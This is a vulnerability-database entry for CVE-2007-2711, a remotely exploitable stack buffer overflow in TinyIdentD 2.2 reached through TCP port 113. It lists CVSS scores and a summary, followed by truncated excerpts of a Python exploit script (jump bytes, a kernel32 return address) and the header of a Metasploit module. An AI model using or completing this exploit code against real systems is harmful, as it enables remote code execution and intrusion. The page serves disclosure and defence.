10
CVSSv2

CVE-2007-2711

Published: 16/05/2007 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in TinyIdentD 2.2 and previous versions allows remote malicious users to execute arbitrary code via a long string to TCP port 113.

Vulnerable Product Search on Vulmon Subscribe to Product

tinyirc tinyidentd

Exploits

# #tinyidentd exploit code by #thomas pollet _at_ gmail com #bug by Maarten Boone # #usage: python exploitpy [target] # import socket,sys #jmp into nop sled payload = '\xeb\x20' #ident crap payload += ', 28 : USERID : UNIX : ' #nop sled payload +='XXXX' # jmp *%esi payload += '\x77\x13\x83\x7c' #XP kernel32dll #payload += '\xb1\x63\xd9\x7 ...
## # $Id: tiny_identd_overflowrb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...